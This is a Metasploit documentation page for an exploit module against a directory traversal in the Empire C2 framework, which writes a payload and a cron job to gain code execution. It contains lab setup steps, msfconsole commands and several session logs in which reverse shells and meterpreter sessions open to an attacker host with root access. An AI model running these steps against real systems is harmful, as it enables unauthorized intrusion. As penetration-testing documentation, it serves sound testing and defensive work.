adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c23c848d2eeffa5a01dfdcdafa63340002b06eb9
metasploit-gs/documentation/modules/exploit/linux/http/empire_skywalker.md
T
Takah1ro 4f061c87fb Update document
2024-07-31 15:43:03 +09:00

328 lines
12 KiB
Markdown
Raw Blame History

## Vulnerable Application
This module exploits a directory traversal vulnerability in both
BC-SECURITY/Empire C2 Framework (<5.9.3) and ProjectEmpire/Empire (<f030cf62) and
writes the payload to /tmp/ directory followed by a cron.d file to execute the payload.
The vulnerability affects:
* BC-SECURITY/Empire C2 Framework (<5.9.3)
* ProjectEmpire/Empire (<f030cf62)
This module was successfully tested on:
* BC-SECURITY/Empire C2 Framework (v5.9.2) on Kali Linux 6.6.15
* BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15
* ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15
### Install and run the vulnerable Empire
#### BC-SECURITY/Empire
1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
2. Install Kali Linux (or other Linux distro) in your virtualization engine.
3. Pull pre-built Empire docker container (<5.9.3) in your VM.
`docker pull bcsecurity/empire:v5.9.2`
4. Run the server and the client on the same VM.
5. Run the server.
`docker run -it --net="host" -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d bcsecurity/empire:v5.9.2`
(`--net="host" -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d` is not realistic but for simplicity
and payload will be loaded in host not in container) or
```
docker run -it --net="host" bcsecurity/empire:v5.9.2
docker exec -it <server container id> bash
apt update
apt install cron
cron
```
\(Payload will be loaded in container but you have to manually set up cron on container.)
6. Run the client.
`docker run -it --net="host" bcsecurity/empire:v5.9.2 client`
7. Execute Empire listener on client.
```bash
uselistener http
set Host <rhost>
set Port <port>
execute
```
#### ProjectEmpire/Empire
1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
2. Install Kali Linux (or other Linux distro) in your virtualization engine.
3. Clone empire.
`git clone https://github.com/EmpireProject/Empire.git`
4. `cd Empire`
5. `git checkout 03ca7bdbcc81457da8e8c1419b36adf66fe9b110`
6. `docker pull empireproject/empire`
7. `docker run -it --net="host" -v $(pwd):/opt/Empire -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d empireproject/empire /bin/bash`
(Payload will be loaded in host not in container.) or
```
docker run -it --net="host" empireproject/empire /bin/bash
cron
```
(Payload will be loaded in container but you have to manually set up cron on container.)
8. `cd setup`
9. `./reset.sh` (Empire start)
10. Execute listener.
```bash
listeners
set Host <rhost>
set Port <port>
run
```
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/empire_skywalker`
4. Do: `set rhost <rhost>`
5. Do: `set rport <port>`
6. Do: `set lhost <attacker-ip>`
7. Optional: `set CVE <cve>`
8. Do: `run`
9. Have the generated request processed by a vulnerable version of Empire
10. You should get a shell or meterpreter
## Options
### TARGETURI (optional)
This is the Base URI path. This is used when CVE is set to `Original`. Default is `/`.
### STAGE0_URI (required)
This is the URI path requested by the initial launcher. This is used when CVE is set to `Original`. Default is `index.asp`.
### STAGE1_URI (required)
This is the URI path used by the RSA key post. This is used when CVE is set to `Original`. Default is `index.jsp`
### PROFILE (optional)
This is Empire agent traffic profile URI. This is used when CVE is set to `Original`.
### CVE (required)
This is the vulnerability to use. Default is `CVE-2024-6127`, but `Original` can also be chosen.
### STAGE_PATH (required)
This is the Empire's default staging path. This is used when CVE is set to `CVE-2024-6127`. Default is `login/process.php`.
([reference](https://github.com/BC-SECURITY/Empire/blob/8aca42747da6cf2b0def7edede94586f6b3258e8/empire/server/common/agents.py#L169))
### PROFILE (required)
This is the Empire's default communication profile agent. This is used when CVE is set to `CVE-2024-6127`.
Default is `Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko`
([reference](https://github.com/BC-SECURITY/Empire/blob/8aca42747da6cf2b0def7edede94586f6b3258e8/empire/server/common/agents.py#L169))
## Scenarios
### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 0, port 80)
```
msf6 > use exploit/linux/http/empire_skywalker
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.7
rhost => 192.168.56.7
msf6 exploit(linux/http/empire_skywalker) > set rport 80
rport => 80
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.7:80 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/NYLkIKRK
[*] Writing cron job to /etc/cron.d/AeVTTPiZ
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (24772 bytes) to 192.168.56.7
[+] Deleted /etc/cron.d/AeVTTPiZ
[+] Deleted /tmp/NYLkIKRK
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.7:48026) at 2024-07-20 11:32:03 +0900
[!] This exploit may require manual cleanup of '/var/lib/powershell-empire/empire/server/downloads/LML47FWS/agent.log' on the target
meterpreter > sysinfo
Computer : kali
OS : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
Architecture : x64
System Language : en_US
Meterpreter : python/linux
```
### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)
```
msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set target 1
target => 1
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/jJzYkeKV
[*] Writing cron job to /etc/cron.d/nFnFIbim
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (36 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/nFnFIbim
[+] Deleted /tmp/jJzYkeKV
[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/WV9TEJTE/agent.log, unknown result
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:42068) at 2024-07-20 14:40:09 +0900
whoami
root
```
### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)
```
msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set target 2
target => 2
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/qxlOSIYF
[*] Writing cron job to /etc/cron.d/ugrYIJzf
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (38 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/ugrYIJzf
[+] Deleted /tmp/qxlOSIYF
[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/JJR8EMKK/agent.log, unknown result
[*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:46040) at 2024-07-20 14:44:09 +0900
whoami
root
```
### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 0, port 8080)
```
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set CVE Original
CVE => Original
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/PSDaqPOJ
[*] Writing cron job to /etc/cron.d/KQlwBZQk
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (24772 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/KQlwBZQk
[+] Deleted /tmp/PSDaqPOJ
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:38552) at 2024-07-24 18:01:04 +0900
[!] This exploit may require manual cleanup of '/agent.log' on the target
meterpreter > sysinfo
Computer : kali
OS : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter >
```
### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)
```
msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set CVE Original
CVE => Original
msf6 exploit(linux/http/empire_skywalker) > set target 1
target => 1
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/VzTAquhE
[*] Writing cron job to /etc/cron.d/LjvThMOu
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (36 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/LjvThMOu
[+] Deleted /tmp/VzTAquhE
[!] Tried to delete /agent.log, unknown result
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:47140) at 2024-07-24 18:06:08 +0900
whoami
root
```
### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)
```
msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set cve Original
cve => Original
msf6 exploit(linux/http/empire_skywalker) > set target 2
target => 2
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/uuTqlfDp
[*] Writing cron job to /etc/cron.d/frDtYnmD
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (38 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/frDtYnmD
[+] Deleted /tmp/uuTqlfDp
[!] Tried to delete /agent.log, unknown result
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:51566) at 2024-07-24 18:08:08 +0900
whoami
root
```
Reference in New Issue View Git Blame Copy Permalink